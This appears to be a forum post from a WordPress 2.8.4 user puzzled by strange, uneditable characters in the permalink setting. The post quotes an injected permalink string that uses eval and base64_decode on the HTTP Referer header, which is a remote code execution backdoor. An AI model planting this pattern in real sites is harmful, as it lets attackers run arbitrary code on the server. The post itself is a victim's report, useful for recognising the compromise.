In WP 2.8.4, the extra stuff shows up in the as the Permalink as I am creating a new post. But the extra characters:
/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
are not editable. I would have thought that any hack would have been over written by the update to 2.8.4.